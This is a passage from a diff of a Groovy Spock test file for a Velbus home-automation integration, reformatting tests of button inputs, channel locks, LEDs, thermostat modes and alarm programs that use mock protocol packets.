-        def scheduledTasksExecutor = Executors.newScheduledThreadPool(1)
-        network = new VelbusNetwork(messageProcessor, scheduledTasksExecutor, null)
-
-        loadDevicePackets(VelbusBasicTest.messageProcessor)
+    then: "the channel should become locked"
+    conditions.eventually {
+      assert device.getPropertyValue("CH8_LOCKED")
     }
 
-    def cleanupSpec() {
-        VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS = writeDelayMillis
-        VelbusDevice.INITIALISATION_TIMEOUT_MILLISECONDS = timeoutMillis
-        if (network != null) {
-            network.close()
-        }
+    and: "the channel should become unlocked again"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 02 06 ED 10 04 00 01 00 EC 04 00 00"))
+    conditions.eventually {
+      assert !device.getPropertyValue("CH8_LOCKED")
     }
 
-    def setup() {
-        network.connect()
+    when: "an input channel is locked indefinitely"
+    device.writeProperty("CH8_LOCK", -1d)
 
-        conditions.eventually {
-            assert network.getConnectionStatus() == ConnectionStatus.CONNECTED
-        }
+    then: "the channel should become locked"
+    conditions.eventually {
+      assert device.getPropertyValue("CH8_LOCKED")
     }
 
-    def cleanup() {
-        def counter = 0
-        while(network.messageQueue.size() > 0 && counter < 100) {
-            Thread.sleep(20)
-            counter++
-        }
-        network.disconnect()
-        network.removeAllDevices()
+    when: "the channel lock is cancelled"
+    device.writeProperty("CH8_LOCK", 0d)
+
+    then: "the channel should become unlocked again"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 02 06 ED 10 04 00 01 00 EC 04 00 00"))
+    conditions.eventually {
+      assert !device.getPropertyValue("CH8_LOCKED")
     }
 
-    def "Input Button Processor Test"() {
-
-        given: "the input button processor"
-        def inputButtonProcessor = (InputProcessor)VelbusDeviceType.VMBGPOD.getFeatureProcessors().find { it.getClass() == InputProcessor.class }
-        VelbusDevice device = null
-
-        when: "A device property value consumer is registered for device address 2 (VMB4AN)"
-        Object ioAlarm1;
-        network.addPropertyValueConsumer(2, "CH1", {
-            newValue -> ioAlarm1 = newValue
-        })
-        device = network.getDevice(2)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMB4AN
-            assert device.getBaseAddress() == 2
-
-            1.upto(8, {
-                def state = (it == 5 ? InputProcessor.ChannelState.PRESSED : InputProcessor.ChannelState.RELEASED)
-                def locked = it == 3
-                assert device.getPropertyValue("CH" + it) == state
-                assert device.getPropertyValue("CH" + it + "_LOCKED") == locked
-                assert device.getPropertyValue("CH" + it + "_LED") == FeatureProcessor.LedState.OFF
-            })
-        }
-
-        when: "an alarm channel is locked for 1s"
-        device.writeProperty("CH8_LOCK", 1d)
-
-        then: "the channel should become locked"
-        conditions.eventually {
-            assert device.getPropertyValue("CH8_LOCKED")
-        }
-
-        and: "the channel should become unlocked again"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 02 06 ED 10 04 00 01 00 EC 04 00 00"))
-        conditions.eventually {
-            assert !device.getPropertyValue("CH8_LOCKED")
-        }
-
-        when: "an input channel is locked indefinitely"
-        device.writeProperty("CH8_LOCK", -1d)
-
-        then: "the channel should become locked"
-        conditions.eventually {
-            assert device.getPropertyValue("CH8_LOCKED")
-        }
-
-        when: "the channel lock is cancelled"
-        device.writeProperty("CH8_LOCK", 0d)
-
-        then: "the channel should become unlocked again"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 02 06 ED 10 04 00 01 00 EC 04 00 00"))
-        conditions.eventually {
-            assert !device.getPropertyValue("CH8_LOCKED")
-        }
-
-        when: "A device property value consumer is registered for device address 1 (VMBGP1)"
-        Object gp1Channel1;
-        network.addPropertyValueConsumer(1, "CH1", {
-            newValue -> gp1Channel1 = newValue;
-        })
-        device = network.getDevice(1)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMBGP1
-            assert device.getBaseAddress() == 1
-            assert device.getSubAddresses()[0] == 2
-            assert device.getSubAddresses()[1] == 255
-            assert device.getSubAddresses()[2] == 255
-            assert device.getSubAddresses()[3] == 255
-
-            // Check the processor shows this device as supporting 8 channels
-            assert inputButtonProcessor.getMaxChannelNumber(device.getDeviceType()) == 8
-
-            // Check channels are enabled
-            1.upto(8, {
-                assert inputButtonProcessor.isChannelEnabled(device, (int)it)
-            })
-        }
-
-        and: "the input button property values should be initialised"
-        conditions.eventually {
-            1.upto(8, {
-                assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.RELEASED
-            })
-        }
-
-        when: "A device property value consumer is registered for device address 48 (VMBGPOD)"
-        Object gpodChannel22
-        network.addPropertyValueConsumer(48, "CH22", {
-            newValue -> gpodChannel22 = newValue
-        })
-        device = network.getDevice(48)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMBGPOD
-            assert device.getBaseAddress() == 48
-            assert device.getSubAddresses()[0] == 49
-            assert device.getSubAddresses()[1] == 50
-            assert device.getSubAddresses()[2] == 255
-            assert device.getSubAddresses()[3] == 64
-
-            // Check the processor shows this device as supporting 32 channels
-            assert inputButtonProcessor.getMaxChannelNumber(device.getDeviceType()) == 32
-
-            // Check channels in disabled sub address show as disabled
-            1.upto(32, {
-                if (it >= 25 && it <= 32) {
-                    assert !inputButtonProcessor.isChannelEnabled(device, it)
-                } else {
-                    assert inputButtonProcessor.isChannelEnabled(device, it)
-                }
-            })
-        }
-
-        and: "the input button property values should be initialised"
-        conditions.eventually {
-            1.upto(32, {
-                if (it >= 25 && it <= 32) {
-                    assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.RELEASED
-                    assert !device.getPropertyValue("CH" + it + "_ENABLED")
-                    assert device.getPropertyValue("CH" + it + "_LED") == FeatureProcessor.LedState.OFF
-                    assert !device.getPropertyValue("CH" + it + "_LOCKED")
-                } else {
-                    assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.RELEASED
-                    assert device.getPropertyValue("CH" + it + "_LED") == FeatureProcessor.LedState.OFF
-                    assert !device.getPropertyValue("CH" + it + "_LOCKED")
-                    assert device.getPropertyValue("CH" + it + "_ENABLED")
-                }
-            })
-        }
-
-        when: "a button is long pressed on the device"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F F8 32 04 00 00 00 20 A3 04 00 00 00 00"))
-
-        then: "the property value should change to LONG_PRESSED"
-        conditions.eventually {
-            assert gpodChannel22 == InputProcessor.ChannelState.LONG_PRESSED
-            assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.LONG_PRESSED
-        }
-
-        when: "the button is released on the device"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F F8 32 04 00 00 20 00 A3 04 00 00 00 00"))
-
-        then: "the property value should return to RELEASED"
-        conditions.eventually {
-            assert gpodChannel22 == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.RELEASED
-        }
-
-        when: "a button is pressed on the device"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F F8 32 04 00 20 00 00 A3 04 00 00 00 00"))
-
-        then: "the property value should change to PRESSED"
-        conditions.eventually {
-            assert gpodChannel22 == InputProcessor.ChannelState.PRESSED
-            assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.PRESSED
-        }
-
-        when: "the button is released on the device"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F F8 32 04 00 00 20 00 A3 04 00 00 00 00"))
-
-        then: "the property value should return to RELEASED"
-        conditions.eventually {
-            assert gpodChannel22 == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.RELEASED
-        }
-
-        and: "eventually the message queue should become empty"
-        conditions.eventually {
-            assert network.messageQueue.size() == 0
-        }
-
-        when: "a button press is written to the device"
-        messageProcessor.sentMessages.clear()
-        network.writeProperty(48, "CH22", InputProcessor.ChannelState.PRESSED.name())
-
-        then: "the button press packet should have been sent to the message processor"
-        conditions.eventually {
-            assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.PRESSED
-            if (network.client == messageProcessor) {
-                assert messageProcessor.sentMessages.contains("0F F8 32 04 00 20 00 00 A3 04 00 00 00 00")
-            }
-        }
-
-        when: "a button release is written to the device"
-        network.writeProperty(48, "CH22", InputProcessor.ChannelState.RELEASED.name())
-
-        then: "the button release packet should have been sent to the message processor"
-        conditions.eventually {
-            assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.RELEASED
-            if (network.client == messageProcessor) {
-                assert messageProcessor.sentMessages.contains("0F F8 32 04 00 00 20 00 A3 04 00 00 00 00")
-            }
-        }
-
-        when: "an input channel is locked for 1s"
-        device.writeProperty("CH8_LOCK", 1d)
-
-        then: "the channel should become locked"
-        conditions.eventually {
-            assert device.getPropertyValue("CH8_LOCKED")
-        }
-
-        and: "the channel should become unlocked again"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 ED 00 FF FF 00 00 00 D4 04"))
-        conditions.eventually {
-            assert !device.getPropertyValue("CH8_LOCKED")
-        }
-
-        when: "an input channel is locked indefinitely"
-        device.writeProperty("CH8_LOCK", -1d)
-
-        then: "the channel should become locked"
-        conditions.eventually {
-            assert device.getPropertyValue("CH8_LOCKED")
-        }
-
-        when: "the channel lock is cancelled"
-        device.writeProperty("CH8_LOCK", 0d)
-
-        then: "the channel should become unlocked again"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 ED 00 FF FF 00 00 00 D4 04"))
-        conditions.eventually {
-            assert !device.getPropertyValue("CH8_LOCKED")
-        }
-
-        and: "eventually the message queue should become empty"
-        conditions.eventually {
-            assert network.messageQueue.size() == 0
-        }
-
-        when: "a channel LED is set to on"
-        messageProcessor.sentMessages.clear()
-        device.writeProperty("CH1_LED", FeatureProcessor.LedState.ON.name())
-
-        then: "the LED should be on"
-        conditions.eventually {
-            device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.ON
-            if (network.client == messageProcessor) {
-                assert messageProcessor.sentMessages.contains("0F FB 30 02 F6 01 CD 04 00 00 00 00 00 00")
-            }
-        }
-
-        when: "a channel LED is set to slow"
-        messageProcessor.sentMessages.clear()
-        device.writeProperty("CH1_LED", FeatureProcessor.LedState.SLOW.name())
-
-        then: "the LED should be on slow"
-        conditions.eventually {
-            device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.SLOW
-            if (network.client == messageProcessor) {
-                assert messageProcessor.sentMessages.contains("0F FB 30 02 F7 01 CC 04 00 00 00 00 00 00")
-            }
-        }
-
-        when: "a channel LED is set to fast"
-        messageProcessor.sentMessages.clear()
-        device.writeProperty("CH1_LED", FeatureProcessor.LedState.FAST.name())
-
-        then: "the LED should be on fast"
-        conditions.eventually {
-            device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.FAST
-            if (network.client == messageProcessor) {
-                assert messageProcessor.sentMessages.contains("0F FB 30 02 F8 01 CB 04 00 00 00 00 00 00")
-            }
-        }
-
-        when: "a channel LED is set to very fast"
-        messageProcessor.sentMessages.clear()
-        device.writeProperty("CH1_LED", FeatureProcessor.LedState.VERYFAST.name())
-
-        then: "the LED should be on very fast"
-        conditions.eventually {
-            device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.VERYFAST
-            if (network.client == messageProcessor) {
-                assert messageProcessor.sentMessages.contains("0F FB 30 02 F9 01 CA 04 00 00 00 00 00 00")
-            }
-        }
-
-        when: "a channel LED is set to off"
-        messageProcessor.sentMessages.clear()
-        device.writeProperty("CH1_LED", FeatureProcessor.LedState.OFF.name())
-
-        then: "the LED should be off"
-        conditions.eventually {
-            device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
-            if (network.client == messageProcessor) {
-                assert messageProcessor.sentMessages.contains("0F FB 30 02 F5 01 CE 04 00 00 00 00 00 00")
-            }
-        }
-
-        when: "A device property value consumer is registered for device address 10 (VMB7IN)"
-        Object vmb7InChannel1;
-        network.addPropertyValueConsumer(10, "CH1", {
-            newValue -> vmb7InChannel1 = newValue;
-        })
-        device = network.getDevice(10)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMB7IN
-            assert device.getBaseAddress() == 10
-
-            // Check the processor shows this device as supporting 7 channels
-            assert inputButtonProcessor.getMaxChannelNumber(device.getDeviceType()) == 7
-
-            // Check channels are enabled
-            1.upto(7, {
-                assert inputButtonProcessor.isChannelEnabled(device, it)
-            })
-        }
-
-        and: "the input button property values should be initialised"
-        conditions.eventually {
-            1.upto(7, {
-                if (it == 1) {
-                    // Channels with enabled counter shows as pressed
-                    assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.PRESSED
-                } else {
-                    assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.RELEASED
-                }
-                assert device.getPropertyValue("CH" + it + "_LED") == FeatureProcessor.LedState.OFF
-                assert !device.getPropertyValue("CH" + it + "_LOCKED")
-                assert device.getPropertyValue("CH" + it + "_ENABLED")
-            })
-        }
-
-        when: "a button is long pressed on the device"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F F8 0A 04 00 00 00 02 E9 04"))
-
-        then: "the property value should change to LONG_PRESSED"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.LONG_PRESSED
-        }
-
-        when: "the button is released on the device"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F F8 0A 04 00 00 02 00 E9 04"))
-
-        then: "the property value should return to RELEASED"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.RELEASED
-        }
-
-        when: "a button is pressed on the device"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F F8 0A 04 00 02 00 00 E9 04"))
-
-        then: "the property value should change to PRESSED"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.PRESSED
-        }
-
-        when: "the button is released on the device"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F F8 0A 04 00 00 02 00 E9 04"))
-
-        then: "the property value should return to RELEASED"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.RELEASED
-        }
-
-        and: "eventually the message queue should become empty"
-        conditions.eventually {
-            assert network.messageQueue.size() == 0
-        }
-
-        when: "a button press is written to the device"
-        messageProcessor.sentMessages.clear()
-        network.writeProperty(10, "CH3", InputProcessor.ChannelState.PRESSED.name())
-
-        then: "the button press packet should have been sent to the message processor"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == InputProcessor.ChannelState.PRESSED
-            if (network.client == messageProcessor) {
-                assert messageProcessor.sentMessages.contains("0F F8 0A 04 00 04 00 00 E7 04 00 00 00 00")
-            }
-        }
-
-        when: "a button release is written to the device"
-        network.writeProperty(10, "CH3", InputProcessor.ChannelState.RELEASED.name())
-
-        then: "the button release packet should have been sent to the message processor"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == InputProcessor.ChannelState.RELEASED
-            if (network.client == messageProcessor) {
-                assert messageProcessor.sentMessages.contains("0F F8 0A 04 00 00 04 00 E7 04 00 00 00 00")
-            }
-        }
+    when: "A device property value consumer is registered for device address 1 (VMBGP1)"
+    Object gp1Channel1
+    network.addPropertyValueConsumer(1, "CH1", { newValue ->
+      gp1Channel1 = newValue
+    })
+    device = network.getDevice(1)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMBGP1
+      assert device.getBaseAddress() == 1
+      assert device.getSubAddresses()[0] == 2
+      assert device.getSubAddresses()[1] == 255
+      assert device.getSubAddresses()[2] == 255
+      assert device.getSubAddresses()[3] == 255
+
+      // Check the processor shows this device as supporting 8 channels
+      assert inputButtonProcessor.getMaxChannelNumber(device.getDeviceType()) == 8
+
+      // Check channels are enabled
+      1.upto(8, {
+        assert inputButtonProcessor.isChannelEnabled(device, (int)it)
+      })
     }
 
-    def "Thermostat Processor Test"() {
-
-        given: "the thermostat processor"
-        def thermostatProcessor = (ThermostatProcessor)VelbusDeviceType.VMBGPOD.getFeatureProcessors().find { it.getClass() == ThermostatProcessor.class }
-        VelbusDevice device = null
-
-        when: "A device property value consumer is registered for a VMBGP1 device with the thermostat enabled"
-        Object gp1CurrentTemp;
-        network.addPropertyValueConsumer(1, "TEMP_CURRENT", {
-            newValue -> gp1CurrentTemp = newValue;
-        })
-        device = network.getDevice(1)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMBGP1
-            assert device.getBaseAddress() == 1
-            assert device.getSubAddresses()[0] == 2
-            assert device.getSubAddresses()[1] == 255
-            assert device.getSubAddresses()[2] == 255
-            assert device.getSubAddresses()[3] == 255
-
-            // Check the processor shows the thermostat as enabled
-            assert thermostatProcessor.isThermostatEnabled(device)
-        }
-
-        when: "A device property value consumer is registered for a VMBGP1 device with the thermostat disabled"
-        network.addPropertyValueConsumer(3, "TEMP_CURRENT", {
-            newValue -> gp1CurrentTemp = newValue;
-        })
-        device = network.getDevice(3)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMBGP1
-            assert device.getBaseAddress() == 3
-            assert device.getSubAddresses()[0] == 255
-            assert device.getSubAddresses()[1] == 255
-            assert device.getSubAddresses()[2] == 255
-            assert device.getSubAddresses()[3] == 255
-
-            // Check the processor shows the thermostat as disabled
-            assert !thermostatProcessor.isThermostatEnabled(device)
-        }
-
-        when: "A device property value consumer is registered for a VMBGPOD device with the thermostat enabled"
-        Object gpodHeatNight;
-        network.addPropertyValueConsumer(48, "TEMP_TARGET_HEAT_NIGHT", {
-            newValue -> gpodHeatNight = newValue;
-        })
-        device = network.getDevice(48)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMBGPOD
-            assert device.getBaseAddress() == 48
-            assert device.getSubAddresses()[0] == 49
-            assert device.getSubAddresses()[1] == 50
-            assert device.getSubAddresses()[2] == 255
-            assert device.getSubAddresses()[3] == 64
-
-            // Check the processor shows the thermostat as enabled
-            assert thermostatProcessor.isThermostatEnabled(device)
-        }
-
-        and: "the thermostat values should be initialised"
-        conditions.eventually {
-            assert device.getPropertyValue("HEATER") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("BOOST") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("PUMP") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("COOLER") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("TEMP_ALARM1") == InputProcessor.ChannelState.PRESSED
-            assert device.getPropertyValue("TEMP_ALARM2") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("TEMP_ALARM3") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("TEMP_ALARM4") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_SAFE
-            assert device.getPropertyValue("TEMP_CURRENT") == 28.0d
-            assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 12d
-            assert device.getPropertyValue("TEMP_TARGET_COOL_COMFORT") == 21d
-            assert device.getPropertyValue("TEMP_TARGET_COOL_DAY") == 23d
-            assert device.getPropertyValue("TEMP_TARGET_COOL_NIGHT") == 26d
-            assert device.getPropertyValue("TEMP_TARGET_COOL_SAFE") == 36d
-            assert device.getPropertyValue("TEMP_TARGET_HEAT_COMFORT") == 25d
-            assert device.getPropertyValue("TEMP_TARGET_HEAT_DAY") == 22d
-            assert device.getPropertyValue("TEMP_TARGET_HEAT_NIGHT") == 16d
-            assert device.getPropertyValue("TEMP_TARGET_HEAT_SAFE") == 12d
-        }
-
-        when: "we update the heat night temperature property"
-        device.writeProperty("TEMP_TARGET_HEAT_NIGHT", 20.5)
-
-        then: "the heat night temp should be updated"
-        conditions.eventually {
-            assert gpodHeatNight == 20.5d
-        }
-
-        when: "we receive a temperature sensor value"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 E6 3F 60 30 A0 3F 80 AB 04"))
-
-        then: "the temperature value should be resolved to 0.1 degrees"
-        assert device.getPropertyValue("TEMP_CURRENT") == 31.7d
-
-        when: "we set thermostat state to disabled"
-        device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.DISABLED.name());
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.DISABLED
-        }
-
-        when: "we set the thermostat state to manual"
-        device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.MANUAL.name());
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.MANUAL
-        }
-
-        when: "we set the thermostat state to normal"
-        device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.NORMAL.name());
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
-        }
-
-        when: "we set the thermostat state to manual"
-        device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.MANUAL.name());
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.MANUAL
-        }
-
-        when: "we set the thermostat state to disabled"
-        device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.DISABLED.name());
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.DISABLED
-        }
-
-        when: "we set the thermostat state to normal"
-        device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.NORMAL.name());
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
-        }
-
-        when: "we set the thermostat mode to heat comfort with timer"
-        device.writeProperty("TEMP_MODE_HEAT_COMFORT_MINS", 1d)
-
-        then: "the state and mode should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.TIMER
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
-            assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 25d
-        }
-
-        when: "we set the thermostat state to disabled"
-        device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.DISABLED.name());
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.DISABLED
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_SAFE
-        }
-
-        when: "we set the thermostat mode to heat comfort with timer"
-        device.writeProperty("TEMP_MODE_HEAT_COMFORT_MINS", 1d)
-
-        then: "the state and mode should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.TIMER
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
-            assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 25d
-        }
-
-        when: "we set the thermostat state to manual"
-        device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.MANUAL.name());
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.MANUAL
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
-        }
-
-        when: "we set the thermostat mode to heat comfort with timer"
-        device.writeProperty("TEMP_MODE_HEAT_COMFORT_MINS", 1d)
-
-        then: "the state and mode should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.TIMER
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
-            assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 25d
-        }
-
-        when: "we set the thermostat state to normal"
-        device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.NORMAL.name());
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
-        }
-
-        when: "we switch back to HEAT SAFE"
-        device.writeProperty("TEMP_MODE", ThermostatProcessor.TemperatureMode.HEAT_SAFE.name())
-
-        then: "the state should update"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_SAFE
-        }
-
-        when: "we set temp mode to COOL DAY"
-        device.writeProperty("TEMP_MODE", ThermostatProcessor.TemperatureMode.COOL_DAY.name())
-
-        then: "the current temp mode should change"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.COOL_DAY
-            assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 23d
-        }
-
-        when: "we set temp mode to COOL COMFORT permanently"
-        // Set to COOL_COMFORT mode permanently
-        messageProcessor.mockPackets["0F FB 30 03 DB FF FF EA 04 00 00 00 00 00"] = [
-            "0F FB 30 08 EA C2 00 1A 37 2A 00 00 97 04"
-        ]
-
-        device.writeProperty("TEMP_MODE_COOL_COMFORT_MINS", -1d)
-
-        then: "the current temp mode should change"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.MANUAL
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.COOL_COMFORT
-        }
-
-        cleanup: "Reset the heat night target temperature"
-        if (device != null) {
-            device.writeProperty("TEMP_TARGET_HEAT_NIGHT", 16d)
-            device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.NORMAL.name())
-            device.writeProperty("TEMP_MODE", ThermostatProcessor.TemperatureMode.HEAT_SAFE.name())
-        }
+    and: "the input button property values should be initialised"
+    conditions.eventually {
+      1.upto(8, {
+        assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.RELEASED
+      })
     }
 
-    def "Programs Processor Test"() {
+    when: "A device property value consumer is registered for device address 48 (VMBGPOD)"
+    Object gpodChannel22
+    network.addPropertyValueConsumer(48, "CH22", { newValue ->
+      gpodChannel22 = newValue
+    })
+    device = network.getDevice(48)
 
-        when: "A device property value consumer is registered for device address 48 (VMBGPOD)"
-        Object gpodAlarm1WakeTime;
-        network.addPropertyValueConsumer(48, "ALARM1_WAKE_TIME", {
-            newValue -> gpodAlarm1WakeTime = newValue;
-        })
-        VelbusDevice device = network.getDevice(48)
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMBGPOD
+      assert device.getBaseAddress() == 48
+      assert device.getSubAddresses()[0] == 49
+      assert device.getSubAddresses()[1] == 50
+      assert device.getSubAddresses()[2] == 255
+      assert device.getSubAddresses()[3] == 64
 
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMBGPOD
-            assert device.getBaseAddress() == 48
-            assert device.getSubAddresses()[0] == 49
-            assert device.getSubAddresses()[1] == 50
-            assert device.getSubAddresses()[2] == 255
-            assert device.getSubAddresses()[3] == 64
+      // Check the processor shows this device as supporting 32 channels
+      assert inputButtonProcessor.getMaxChannelNumber(device.getDeviceType()) == 32
+
+      // Check channels in disabled sub address show as disabled
+      1.upto(32, {
+        if (it >= 25 && it <= 32) {
+          assert !inputButtonProcessor.isChannelEnabled(device, it)
+        } else {
+          assert inputButtonProcessor.isChannelEnabled(device, it)
         }
-
-        and: "the programs property values should be initialised"
-        conditions.eventually {
-            1.upto(24, {
-                def programStepsEnabled = it != 13
-                assert device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX) == programStepsEnabled
-            })
-
-            assert !device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-            assert !device.getPropertyValue("SUNRISE_ENABLED")
-            assert device.getPropertyValue("SUNSET_ENABLED")
-            assert device.getPropertyValue("ALARM1_ENABLED")
-            assert !device.getPropertyValue("ALARM2_ENABLED")
-            assert device.getPropertyValue("ALARM1_MASTER")
-            assert !device.getPropertyValue("ALARM2_MASTER")
-            assert device.getPropertyValue("ALARM1_WAKE_TIME").equals(gpodAlarm1WakeTime)
-            assert device.getPropertyValue("ALARM1_WAKE_TIME") == "16:00"
-            assert device.getPropertyValue("ALARM1_BED_TIME") == "22:00"
-            assert device.getPropertyValue("ALARM2_WAKE_TIME") == "08:00"
-            assert device.getPropertyValue("ALARM2_BED_TIME") == "23:00"
-            assert device.getPropertyValue("PROGRAM") == ProgramsProcessor.Program.SUMMER
-        }
-
-        when: "alarm 1 is disabled and alarm 2 is enabled"
-        device.writeProperty("ALARM1_ENABLED", false)
-        device.writeProperty("ALARM2_ENABLED", true)
-
-        then: "the alarms should update to match"
-        conditions.eventually {
-            assert !device.getPropertyValue("ALARM1_ENABLED")
-            assert device.getPropertyValue("ALARM2_ENABLED")
-        }
-
-        when: "sunrise is enabled and sunset disabled"
-        device.writeProperty("SUNRISE_ENABLED", true)
-        device.writeProperty("SUNSET_ENABLED", false)
-
-        then: "the alarms should update to match"
